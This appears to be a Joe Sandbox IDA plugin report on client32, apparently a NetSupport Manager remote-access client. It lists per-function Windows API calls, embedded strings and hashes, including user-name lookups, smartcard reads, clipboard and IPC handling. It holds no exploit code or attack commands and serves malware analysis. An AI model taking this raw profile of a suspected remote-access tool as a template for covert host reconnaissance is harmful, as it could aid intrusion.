                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryTimetime$AddressCloseErrorFreeLastLoadOpenProcVersion_memset_strncpy
                                                        • String ID: GetUserNameEx ret %d, %s, time=%d ms, e=%d$GetUserNameExA$secur32.dll
                                                        • API String ID: 780815626-3523682560
                                                        • Opcode ID: 811087eced48bf1352f6921602963d150d6912d54705ec714e7290c854b1a43f
                                                        • Instruction ID: bfca20c34ba55109964591b9ec2aab8120f7022172a2dbe8792ba9d2971a07f3
                                                        • Opcode Fuzzy Hash: 811087eced48bf1352f6921602963d150d6912d54705ec714e7290c854b1a43f
                                                        • Instruction Fuzzy Hash: CC21A176D00665ABDB119FA8DD88BAFFFB8EB45B25F144125ED15E3244E7309900CBE0
                                                        APIs
                                                        • std::_Xinvalid_argument.LIBCPMT ref: 110CD5E0
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
                                                          • Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
                                                          • Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E
                                                        • _memmove.LIBCMT ref: 110CD667
                                                        • _memmove.LIBCMT ref: 110CD68B
                                                        • _memmove.LIBCMT ref: 110CD6C5
                                                        • _memmove.LIBCMT ref: 110CD6E1
                                                        • std::exception::exception.LIBCMT ref: 110CD72B
                                                        • __CxxThrowException@8.LIBCMT ref: 110CD740
                                                        Strings
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                        • String ID: deque<T> too long
                                                        • API String ID: 827257264-309773918
                                                        • Opcode ID: 53509356ea8bdf0e54952da7c3cb1b9069d41bb1bf0bff1c0fd6a3581a53c676
                                                        • Instruction ID: 6781a1fe05296667d86fcfe15e514985d94196c5d48f867e94dc86382c5f7813
                                                        • Opcode Fuzzy Hash: 53509356ea8bdf0e54952da7c3cb1b9069d41bb1bf0bff1c0fd6a3581a53c676
                                                        • Instruction Fuzzy Hash: 0D51B676E001059BDB44CFA8CC81AAEFBE5AF94614F19C6A9D819D7344EA74FA01CBD0
                                                        APIs
                                                        • GetWindowRect.USER32(00000000,?), ref: 110C325D
                                                        • BeginDeferWindowPos.USER32(?), ref: 110C327F
                                                        • GetWindowRect.USER32(?,?), ref: 110C32A9
                                                        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110C32D6
                                                        • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000017), ref: 110C3365
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • EndDeferWindowPos.USER32(00000000), ref: 110C3381
                                                        Strings
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110C3243
                                                        • m_hWnd, xrefs: 110C3248
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$Defer$Rect$BeginErrorExitLastMessagePointsProcesswsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 553022447-1557312927
                                                        • Opcode ID: c001c96da27efb8ecc90982f93b48cea9dc7f9539eb4b79afcd969ba7f90e69b
                                                        • Instruction ID: 7f695be0691b523cdd1d5d21dea229869abac41504e52d19061d8b85fb76dc47
                                                        • Opcode Fuzzy Hash: c001c96da27efb8ecc90982f93b48cea9dc7f9539eb4b79afcd969ba7f90e69b
                                                        • Instruction Fuzzy Hash: 0051D0B6E00609AFCB10CFA9C984A9EFBF5BF88314F148259E855A7744C730B941CFA0
                                                        APIs
                                                          • Part of subcall function 111057A0: GetClientRect.USER32(?,?), ref: 111057CA
                                                        • GetWindowRect.USER32(?,?), ref: 1110B100
                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 1110B112
                                                        • GetClientRect.USER32(?,?), ref: 1110B120
                                                        • GetScrollRange.USER32(?,00000000,?,?), ref: 1110B161
                                                        • GetSystemMetrics.USER32(00000003), ref: 1110B171
                                                        • GetScrollRange.USER32(?,00000001,?,00000000), ref: 1110B184
                                                        • GetSystemMetrics.USER32(00000002), ref: 1110B18E
                                                        Strings
                                                        • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 1110B1D4
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                        • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                        • API String ID: 4172599486-2052393828
                                                        • Opcode ID: 64ddedc56d88887bb4451be383381c356aadea2b9397b7b8a9063e4f72324cbb
                                                        • Instruction ID: 963abaf8dc2dfbd8bd83222bbfeff6eec01238f1e7f741d42411ca3803a77853
                                                        • Opcode Fuzzy Hash: 64ddedc56d88887bb4451be383381c356aadea2b9397b7b8a9063e4f72324cbb
                                                        • Instruction Fuzzy Hash: BA51B0B5E00609AFDB04CFA8D985AEEFBF9FF88314F108529E519A3240D770A941CF64
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • GetTickCount.KERNEL32 ref: 111231A0
                                                        • Beep.KERNEL32(00000000,00000000), ref: 11123295
                                                        Strings
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BeepCountTick__wcstoi64
                                                        • String ID: *SoundWhileViewed$BeepWhileViewed$Client
                                                        • API String ID: 666309045-3409951188
                                                        • Opcode ID: d920f05703bcd11949c8e46f564084d737ad2e5f5d74a240adc2f0c53d488819
                                                        • Instruction ID: 88fc7c2c2ff2b611e8e8a37401301b3f6159e5831b8fa70f0dc415b1a958c5df
                                                        • Opcode Fuzzy Hash: d920f05703bcd11949c8e46f564084d737ad2e5f5d74a240adc2f0c53d488819
                                                        • Instruction Fuzzy Hash: 56417B36A1C6616BD7518A608D84BDFFB298F5B718FB04264EC6897180FF30E941CB51
                                                        APIs
                                                        • SetPropA.USER32(?,?), ref: 1101547F
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 11015190: BeginPaint.USER32(?,?), ref: 110151BF
                                                          • Part of subcall function 11015190: GetWindowRect.USER32(00000000,?), ref: 110151EC
                                                          • Part of subcall function 11015190: _memset.LIBCMT ref: 110151FA
                                                          • Part of subcall function 11015190: CreateFontIndirectA.GDI32(?), ref: 11015216
                                                          • Part of subcall function 11015190: SelectObject.GDI32(00000000,00000000), ref: 1101522A
                                                          • Part of subcall function 11015190: SetBkMode.GDI32(00000000,00000001), ref: 11015235
                                                          • Part of subcall function 11015190: BeginPath.GDI32(00000000), ref: 11015242
                                                          • Part of subcall function 11015190: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015260
                                                          • Part of subcall function 11015190: EndPath.GDI32(00000000), ref: 11015267
                                                          • Part of subcall function 11015190: PathToRegion.GDI32(00000000), ref: 1101526E
                                                          • Part of subcall function 11015190: CreateSolidBrush.GDI32(?), ref: 11015280
                                                          • Part of subcall function 11015190: CreateSolidBrush.GDI32(?), ref: 11015296
                                                          • Part of subcall function 11015190: CreatePen.GDI32(00000000,00000002,?), ref: 110152B0
                                                          • Part of subcall function 11015190: SelectObject.GDI32(00000000,00000000), ref: 110152BE
                                                          • Part of subcall function 11015190: SelectObject.GDI32(00000000,?), ref: 110152CE
                                                        • GetPropA.USER32(?), ref: 1101548E
                                                        • wsprintfA.USER32 ref: 110154C3
                                                        • RemovePropA.USER32(?), ref: 110154F8
                                                        • DefWindowProcA.USER32(?,?,?,?), ref: 11015521
                                                        Strings
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
                                                        • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                        • API String ID: 1924375018-841114059
                                                        • Opcode ID: ec3e1234084b3d82126ba732f157090ad2e44ab0648003b83a7f936b10213f93
                                                        • Instruction ID: 2915d23f9928799d524ed0ec110504297751baa3e875027ded2e10bedea347e8
                                                        • Opcode Fuzzy Hash: ec3e1234084b3d82126ba732f157090ad2e44ab0648003b83a7f936b10213f93
                                                        • Instruction Fuzzy Hash: 9531A976E01125ABDB11CF94DC84FAEB7A8FF4A319F04816AF9069F144EB359940CB61
                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 1103F27C
                                                        • _malloc.LIBCMT ref: 1103F29A
                                                          • Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
                                                          • Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
                                                          • Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616
                                                        • GetLastError.KERNEL32 ref: 1103F30C
                                                        • _free.LIBCMT ref: 1103F321
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • CLTCONN.CPP, xrefs: 1103F2D9
                                                        • Error %d reading from smartcard device, xrefs: 1103F313
                                                        • transferred == datalen, xrefs: 1103F2DE
                                                        • Read %u bytes from smartcard device, xrefs: 1103F2EF
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$AllocateExitHeapMessageProcess_free_mallocwsprintf
                                                        • String ID: CLTCONN.CPP$Error %d reading from smartcard device$Read %u bytes from smartcard device$transferred == datalen
                                                        • API String ID: 492257515-1619960733
                                                        • Opcode ID: 45337b85cd20c82b6ba6e7d5a7b1afb4a068f215ff6c3b5f05ba6ffaf63b7d09
                                                        • Instruction ID: 5c0ce5a60e48b42dacdb937ef0d5d9348949da67155b38d00fc4e8c999954ed4
                                                        • Opcode Fuzzy Hash: 45337b85cd20c82b6ba6e7d5a7b1afb4a068f215ff6c3b5f05ba6ffaf63b7d09
                                                        • Instruction Fuzzy Hash: EA3190B5E0050AAFCB00DF98DC80EAFF7B9FB89714F544559E915A3380E731A9048BA2
                                                        APIs
                                                        • GetMenuItemCount.USER32(?), ref: 1100517E
                                                        • _memset.LIBCMT ref: 110051A0
                                                        • GetMenuItemID.USER32(?,00000000), ref: 110051B4
                                                        • CheckMenuItem.USER32(?,00000000,00000000), ref: 11005211
                                                        • EnableMenuItem.USER32(?,00000000,00000000), ref: 11005227
                                                        • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005248
                                                        • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005274
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                        • String ID: 0
                                                        • API String ID: 2755257978-4108050209
                                                        • Opcode ID: 49b977d40c07f5e2c66648d899f03e2c19a34532f2eedabc1b5daecf0946c252
                                                        • Instruction ID: 6013c0d9d1bdd2596c58563bf639684a5b16c11bd1ef64a9a4ff28934d00860a
                                                        • Opcode Fuzzy Hash: 49b977d40c07f5e2c66648d899f03e2c19a34532f2eedabc1b5daecf0946c252
                                                        • Instruction Fuzzy Hash: 71316E71D01219AFEB01DFA4D885BEEBBFCEF4A798F008059F941A6240E7B59944CB60
                                                        APIs
                                                        • _malloc.LIBCMT ref: 1103122A
                                                        • _memset.LIBCMT ref: 11031261
                                                        • RegisterClipboardFormatA.USER32(?), ref: 11031289
                                                        • GetLastError.KERNEL32 ref: 11031294
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • _memmove.LIBCMT ref: 110312DE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$ClipboardExitFormatMessageProcessRegister_malloc_memmove_memsetwsprintf
                                                        • String ID: !*ppClipData$(*ppClipData)->pData$..\ctl32\clipbrd.cpp
                                                        • API String ID: 2414640225-228067302
                                                        • Opcode ID: de00dd6ae2d3d7f906a03fecd9d9ec7b5d09c710752e4d4d289d86674a34989d
                                                        • Instruction ID: 14e8dd57a7feced4d25e4c3e85cd85d2286920d3da7b542c8ccc3d839dc859fc
                                                        • Opcode Fuzzy Hash: de00dd6ae2d3d7f906a03fecd9d9ec7b5d09c710752e4d4d289d86674a34989d
                                                        • Instruction Fuzzy Hash: 44318DB9A00706ABD714DF64C881F6AF3B4FF89708F14C558E9598B340EB70EA54CBA0
                                                        APIs
                                                        • GetMenu.USER32(00000000), ref: 110B1448
                                                        • EnableWindow.USER32(00000000,00000000), ref: 110B1483
                                                        • EnableWindow.USER32(00000000,00000000), ref: 110B14AD
                                                        • EnableWindow.USER32(00000000,00000000), ref: 110B14DD
                                                        • EnableWindow.USER32(?,00000000), ref: 110B14E4
                                                        • EnableMenuItem.USER32(110B689C,00000000,00000002), ref: 110B14FE
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Enable$Window$Menu$ErrorExitItemLastMessageProcesswsprintf
                                                        • String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                        • API String ID: 703148351-1557312927
                                                        • Opcode ID: 3c57b5d810544df76335c1307041a00c7c7120df7f96d05c297ab18d3a0fa9b2
                                                        • Instruction ID: c715c16d4c75479b9699dac4ef5c5b91c87fbe03cd8a25a8d52e0fd67f325f0a
                                                        • Opcode Fuzzy Hash: 3c57b5d810544df76335c1307041a00c7c7120df7f96d05c297ab18d3a0fa9b2
                                                        • Instruction Fuzzy Hash: 5021F675F40612BBC315DB75DC84FDAFBA5BF45218F048128EA085B181EB34A851CBE5
                                                        APIs
                                                        Strings
                                                        • Warning. IPC msg but no wnd. Waiting..., xrefs: 110257BF
                                                        • HandleIPC ret %x, took %d ms, xrefs: 11025810
                                                        • Warning. IPC took %d ms - possible unresponsiveness, xrefs: 11025827
                                                        • IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d), xrefs: 11025798
                                                        • IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d), xrefs: 11025779
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick$Sleep
                                                        • String ID: HandleIPC ret %x, took %d ms$IPC copydata, dw=%d, cb=%d, pv=x%x, sender=x%x (%d)$IPC, what=%d, msg=x%x, wP=x%x, lP=x%x, timeout=%d, sender=x%x (%d)$Warning. IPC msg but no wnd. Waiting...$Warning. IPC took %d ms - possible unresponsiveness
                                                        • API String ID: 4250438611-314227603
                                                        • Opcode ID: f0b4fd3c98b5580777bb38eafbc8a38d8b1eb00d735c0e8546a73c597d21ad9a
                                                        • Instruction ID: 856ebef11915e97a845ae59ce9eeaf6af0a263cab1a7eb4eff15662075c9ff21
                                                        • Opcode Fuzzy Hash: f0b4fd3c98b5580777bb38eafbc8a38d8b1eb00d735c0e8546a73c597d21ad9a
                                                        • Instruction Fuzzy Hash: FA21E6BAE11514AFD710CE59ECC4EABB3EDEBC8368F408529EC4A83244D531AC40DBA5
                                                        APIs
                                                        • _strncmp.LIBCMT ref: 110094BA
                                                        • _strncmp.LIBCMT ref: 110094CA
                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,82E0FB89), ref: 1100956B
                                                        Strings
                                                        • https://, xrefs: 110094AF
                                                        • IsA(), xrefs: 11009525, 1100954D
                                                        • http://, xrefs: 110094B5, 110094C8
                                                        • <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td , xrefs: 110094F1
                                                        • e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 11009520, 11009548
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strncmp$FileWrite
                                                        • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$http://$https://
                                                        • API String ID: 1635020204-3133059256
                                                        • Opcode ID: b11a3e4c238259d2fbc588d12090e526e1a57e1cc9220299ac93f4f0d3e75ca9
                                                        • Instruction ID: f49766fd7765917b195ffb41f19f8f79b4adc18e23b7e5197df46bfb74996d4c
                                                        • Opcode Fuzzy Hash: b11a3e4c238259d2fbc588d12090e526e1a57e1cc9220299ac93f4f0d3e75ca9
                                                        • Instruction Fuzzy Hash: 8B318B7AE0061AABDB11DF85CC44FDEF7B8FF49654F008158F815A7280EB34AA04CBA1
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 1110B7AA
                                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 1110B7BC
                                                        • GetSystemMetrics.USER32(00000002), ref: 1110B7CA
                                                        • GetSystemMetrics.USER32(00000003), ref: 1110B7DF
                                                        • GetSystemMetrics.USER32(0000004E), ref: 1110B829
                                                        • GetSystemMetrics.USER32(0000004F), ref: 1110B833
                                                        • GetSystemMetrics.USER32(00000000), ref: 1110B846
                                                        • GetSystemMetrics.USER32(00000001), ref: 1110B859
                                                        • GetWindowRect.USER32(?,?), ref: 1110B8C6
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004C), ref: 1108E4DE
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004D), ref: 1108E4E7
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004E), ref: 1108E4EE
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(00000000), ref: 1108E4F7
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(0000004F), ref: 1108E4FD
                                                          • Part of subcall function 1108E4D0: GetSystemMetrics.USER32(00000001), ref: 1108E505
                                                          • Part of subcall function 1108E460: _memset.LIBCMT ref: 1108E48F
                                                          • Part of subcall function 1108E460: FreeLibrary.KERNEL32(00000000,?,75A44920,1110B942,00000002), ref: 1108E49A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MetricsSystem$Window$Rect$FreeLibraryPoints_memset
                                                        • String ID:
                                                        • API String ID: 314733930-0
                                                        • Opcode ID: d7eadc563fd8f1edf11073224b815364cadfebc45bd2c66acbb8496d4c6402ae
